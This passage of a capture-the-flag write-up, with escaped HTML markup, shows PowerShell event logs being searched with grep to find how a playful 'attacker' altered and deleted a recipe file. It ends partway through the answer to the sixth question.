    &lt;span class="nt"&gt;&amp;quot;EventData&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;ContextInfo&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;        Severity = Informational\r\n        Host Name = ConsoleHost\r\n        Host Version = 5.1.19041.1682\r\n        Host ID = 21ec2576-2920-4c0f-8047-0b85ad219ffa\r\n        Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n        Engine Version = 5.1.19041.1682\r\n        Runspace ID = 4181eda9-20e6-4eb9-8869-fe5fa6d5e663\r\n        Pipeline ID = 257\r\n        Command Name = \r\n        Command Type = Script\r\n        Script Name = \r\n        Command Path = \r\n        Sequence Number = 1703\r\n        User = DESKTOP-R65OKRB\\Chris Massey\r\n        Connected User = \r\n        Shell ID = Microsoft.PowerShell\r\n&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Payload&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;CommandInvocation(Out-Default): \&amp;quot;Out-Default\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Recipe from Mixolydian, the Queen of Dorian\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Lembanh Original Recipe\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot; \&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;2 1/2 all purpose flour\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1 Tbsp baking powder\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1/4 tsp salt\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1/2 c  butter\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1/3 c brown sugar\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1 tsp cinnamon\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1/2 tsp honey (secret ingredient)\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;2/3 c heavy whipping cream\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;1/2 tsp vanilla extract\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Preheat oven to 425F. Mix the flour, baking powder and salt into a large bowl. Add the butter and mix with a well till fine granules (easiest way is with an electric mixer). Then add the sugar and cinnamon, and mix them thoroughly.\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Finally add the cream, honey, and vanilla and stir them in with a fork until a nice, thick dough forms.\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Roll the dough out about 1/2 in thickness. Cut out 3-inch squares and transfer the dough to a cookie sheet.Criss-cross each square from corner-to-corner with a knife, lightly (not cutting through the dough).\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Bake for about 12 minutes or more (depending on the thickness of the bread) until it is set and lightly golden.\&amp;quot;\r\nParameterBinding(Out-Default): name=\&amp;quot;InputObject\&amp;quot;; value=\&amp;quot;Let cool completely before eating, this bread tastes better room temperature and dry. Also for more flavor you can add more cinnamon or other spices\&amp;quot;\r\n&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;UserData&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;System&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Channel&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Microsoft-Windows-PowerShell/Operational&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Computer&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;DESKTOP-R65OKRB&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Correlation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;ActivityID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;54BDC5C1-F7AB-0001-FA72-BF54ABF7D801&amp;quot;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;EventID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;4103&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;EventRecordID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;7905&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Execution&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;ProcessID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1216&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;ThreadID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;4080&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Keywords&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;0x0&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Level&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Opcode&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Provider&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;Guid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;A0C1853B-5C40-4B15-8766-3CF1C58F985A&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;Name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Microsoft-Windows-PowerShell&amp;quot;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Security&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;quot;UserID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;S-1-5-21-3359507890-24144431-3438718502-1002&amp;quot;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Task&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;106&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;TimeCreated&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;          &lt;span class="nt"&gt;&amp;quot;SystemTime&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;2022-12-24T11:01:03.659392Z&amp;quot;&lt;/span&gt;
&lt;/span&gt;        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;Version&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The attack took place on &lt;code&gt;12/24/2022&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;2. An attacker got a secret from a file. What was the original file&amp;#39;s name?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's look at the &lt;code&gt;ScriptBlockText&lt;/code&gt; attribute of the events. It contains
the PowerShell scripts that were executed. Let's also look for a keyword such
as &lt;code&gt;recipe&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*recipe&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;echo \&amp;quot;Dec 18 2022 `nLembanh! Santa wants us to try making some this year. We searched everywhere for this recipe that&amp;#39;s supposed to have the secret ingredient to really make it authentic. It&amp;#39;s gonna be delicious, I&amp;#39;m so excited!\&amp;quot; &amp;gt;&amp;gt; mydiary.txt&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\Recipe.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Apparently, the file is called &lt;code&gt;Recipe&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;3. The contents of the previous file were retrieved, changed, and stored to
a variable by the attacker. This was done multiple times. Submit the last
full PowerShell line that performed only these actions.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the command must retrieve the content, modify it, and store it in a
variable. We can actually see that from our last command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*recipe&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;echo \&amp;quot;Dec 18 2022 `nLembanh! Santa wants us to try making some this year. We searched everywhere for this recipe that&amp;#39;s supposed to have the secret ingredient to really make it authentic. It&amp;#39;s gonna be delicious, I&amp;#39;m so excited!\&amp;quot; &amp;gt;&amp;gt; mydiary.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\Recipe.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The last PowerShell line is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$foo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;Recipe&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt; &lt;span class="o"&gt;-replace&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;honey&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;fish oil&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;4. After storing the altered file contents into the variable, the attacker
used the variable to run a separate command that wrote the modified data
to a file. This was done multiple times. Submit the last full PowerShell
line that performed only this action.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So this time the command only stores our variable to a file. This can &lt;em&gt;still&lt;/em&gt;
be seen in our previous command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*recipe&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;echo \&amp;quot;Dec 18 2022 `nLembanh! Santa wants us to try making some this year. We searched everywhere for this recipe that&amp;#39;s supposed to have the secret ingredient to really make it authentic. It&amp;#39;s gonna be delicious, I&amp;#39;m so excited!\&amp;quot; &amp;gt;&amp;gt; mydiary.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\Recipe.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The command is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$foo&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Add-Content&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Recipe&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;5. The attacker ran the previous command against one file multiple times. What
is the name of this file?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's search for &lt;code&gt;Add-Content&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*Add-Content&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file is &lt;code&gt;Recipe.txt&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;6. Were any files deleted (Yes/No)?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's go to our trusty first command. We can see that two files were deleted:&lt;/p&gt;
